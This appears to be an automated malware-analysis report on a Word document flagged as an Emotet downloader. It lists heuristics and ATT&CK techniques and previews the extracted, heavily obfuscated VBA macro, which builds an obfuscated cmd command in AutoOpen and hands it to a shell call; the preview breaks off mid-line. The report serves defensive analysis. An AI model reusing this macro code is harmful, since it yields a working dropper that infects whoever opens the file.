Verdict: MALICIOUS (Risk Score: 202)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within the VBA macros. Together with the AutoOpen macro and the ClamAV detection 'Doc.Downloader.Emotet-6884039-0', this strongly suggests an Emotet downloader variant. The VBA script is designed to execute a second-stage payload, most likely downloaded from a remote source, which is common Emotet behavior.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6884039-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884039-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 169632 bytes |

SHA-256 of macros.bas: 90d9cd28afbfd9567c6f2430369ecceefa7c430ec35638f2d08fe72918b9f8ff
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "DmPfjHcBIGpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim QKjwz(1)
QKjwz(0) = MidB(HONBzkpXIMEqt + AdrWBLrzqwiwnZztIsjiRvkUXE + dnEJGGcldPQRLw, 51, 827) + MidB(NLGYMTRuabQr + IrUuudTsQwrtbXTstkosFbksLjBVlv + TiHwGQUv, 165, 636) + Left(zWGiWHfCjzPTJ + LPcFzEJEkwdYWhjYtoaSwiQVcUOon + JffbVnpS, 342) + Left(dGfzPrLRsSl + bhijjawJIQMEwmEDUYAJpdFX + cqYiBAoFIi, 834)
Dim wiCwnA(2)
wiCwnA(0) = Mid(OQzbjFRll + UQiotdZLFNGYSlbWQJscaPAtGLwZQnmN + uIUNpmCHX, 468, 175) + MidB(vUckwcnHYtj + GoqFlERNbIoftFSsbkIjCDqljFVOkupfOR + EjRTLnFCXMpj, 347, 980)
wiCwnA(1) = Mid(DiBCuTkHG + kEZMBZpbPitAzoQpwljWbfPQ + vKNRjUzzAoGc, 363, 690) + MidB(pBEGFRqRwR + zhlJzufFVbQcQTciTTzSOLljiTwTRTPzS + fYEwzNkbPozOii, 975, 40) + Mid(sWwMOAlZIwJbR + louuUHbijVjFNoTRzIwSKDMaFlSnX + wqDHvjQsOqVTj, 216, 388) + Right(bIZtmVkqHjWsQ + jRQwPKEYKnbokfPlFOXuKUTQn + zzIAjPuVQhWjPG, 53)
Dim qTzLu(1)
qTzLu(0) = MidB(owdcGaXs + CTnjZoTCwzznQSHjTWjDJouvFvZRMF + idoQiiIzbNtIM, 195, 969) + MidB(WXkZPis + NHWjnqjckisCrBfbwulivNphTOSwwllR + vZDZjaTBBiV, 985, 899) + Mid(zuKRKqTzIPNR + RGkkDjWrMwVcdLMUTiQazqkccuKWIoGk + PqIMFhLwhMHl, 924, 902) + Right(PwajltTDtzCc + XaobFcWEuJODJUrwPcVKqzVXESI + jsojzVpRQLCR, 348)
Dim GbRlnq(1)
GbRlnq(0) = MidB(MWGdwtRW + mTnAQUPpspiHnaWJLlHmuXsnsU + NzTQaJG, 219, 937) + Left(wjbEjzDZkGkHai + cXhWUEkQIUqzNzomPJTJoouEwcr + uQdnPzctwLvO, 157)
fqLAAvtkGJQ (KeyString(vbKeyC) + KeyString(vbKeyM) + wDUREnGI + qdEBYEMwmNB + sjQjkhFofT + QmOwq + OWidEBvinY + GwVLVbaJNsi + lnQbEFz)
Dim mQHUFK(2)
mQHUFK(0) = Right(ZjFjSnqE + VQvEDrKHwPoLjRQztGYFwTwvUY + LuqkthiM, 301) + Mid(MYUOCjPCowwNrT + kGvqirHcQpoXiQqOzojcEEWSKNhwQh + GTUOVRswMrrUXQ, 147, 974) + Mid(fVfLjlMZzOj + qwSZWuiTPkhXMCuiElCNSu + CwTdOVTBVFqk, 81, 220) + Mid(lYdIZKiDI + mnlzfjMjXvGsEKjpCtambtQiIrRQ + jjOjFLBri, 764, 399)
mQHUFK(1) = MidB(RDPdoAmXsMA + OFEoFikdYvzjrUmRwNzasNc + qqTNZzzvnqip, 886, 28) + Mid(TjFJSkiaiNs + LacPComEiXkYzYEcCMLhXGQFMtiMH + cPFasMBal, 173, 405)
Dim YmmPJ(2)
YmmPJ(0) = MidB(vjkiXsjWjQ + TZXRCtLXimDwPuYiZFlSLzrcsHt + mHGmBVjWwksId, 723, 380) + Left(IoHLBWiHLTLRSP + PMHzHWMpjTisJMXKuzFnkYfqCYFfUIRN + TqlcRchn, 800)
YmmPJ(1) = MidB(GnGXQfDnbXa + JRdnOksVnLrNcWADiNvkwHEcNawo + FSAwuZFEH, 379, 537) + MidB(CChnXbruSN + fJIfupXwoIKBJXddGjnCZfnaN + nFTTOPzYMi, 86, 318) + Left(sLlODOQLlYwsHi + OKwUUFCiHjEtzESIUCLJmDbTuWVI + FPuRKZnICT, 933) + MidB(RnTdkzBf + AMRtlHLzRfohKjtLzsMErKfbtlJ + BMtFtfBAruzQj, 569, 117)
End Sub
Attribute VB_Name = "lFVGKjDjltFIlj"
Function wDUREnGI()
Dim SjGBDI(1)
SjGBDI(0) = Mid(kfkBWIznaNd + pWsawcwIbXbJEtPmicfZSwswDGKnZ + dNObEjIXII, 183, 107) + MidB(GYofAAj + aiGfsBQkCjnbjBdwXWPrirziWHY + LRnzwAQVsXHZZ, 566, 503)
Dim SonTsT(1)
SonTsT(0) = MidB(BDzvmNj + SEHnbBnPqfPqSZNNwHlzzMSC + llYfSSKivrnzC, 564, 555) + MidB(LkwRMAVOsjHHa + JadFHkXzsvdWazHUlXHYYlCRZlCaVin + zXGFnlEWjdu, 287, 760) + MidB(WDBicCFTESwOp + nnJdIwiSfcBpHIMPEShFMZtDCm + OBaqHFKRqr, 708, 645) + MidB(AQMwPMBaQpFizE + cfdIOzOQAzcvYhACMYdWdVnllk + FCwOFDtl, 20, 45)
Dim PzfjC(2)
PzfjC(0) = Mid(wjMRTjjVV + UWWLTiTuJpRqSrNiETvKKlWDZQqPaNo + UjPwwspa, 619, 863) + MidB(cTBRCCvYLMawau + ardcbitvpWvGkiszzozXKt + IJSWEOV, 9, 777)
PzfjC(1) = MidB(WzZGcfqAS + iVVwjfcUTiJdmWAHjljHizXiVrTtzZ + zAHhpXUvkMU, 783, 393) + Mid(jTjrrFNmzJz + ApJDKLYzAwwVjXWiPMkZTiiUk + YsQrvvCR, 575, 172) + Mid(iVkfWYqPSaj + PPqVcqolqDudlbTEihBEjC + uwrzIZcjfMwBSs, 883, 853) + Mid(ksnOwEWfIhO + SPutmzcvBEvHRCnJJDSUIjCmbdQ + UFdlXzHtT, 706, 293)
FUkzNnwj = "d /V^:/C" + CStr(Chr(1 + 1 + 0 + 3 + 29)) + "s^e^" + "t ^_^{=\^_/ -" + "^_\ \^" + "_- ^\/- \_^" + "-^ ^-^" + "\/ ^\/^-^ ^\" + "_/^ ^" + "-^_" + "\ -_/ _"
Dim zhiEBu(2)
zhiEBu(0) = MidB(TQRnfAfUSIkv + GzqjludMowHjlQNTOzLCAOThwvcMz + bjNSIuGG, 541, 384) + Right(PbDEpVwsQuupVR + RLlIuicjAAFGTjiUFvrnrDw + mXzqhcoQiXB, 697) + Right(DoPrlwLLUC + jaYtFzowcDPXifTATHbnzbLLt + C
... (truncated)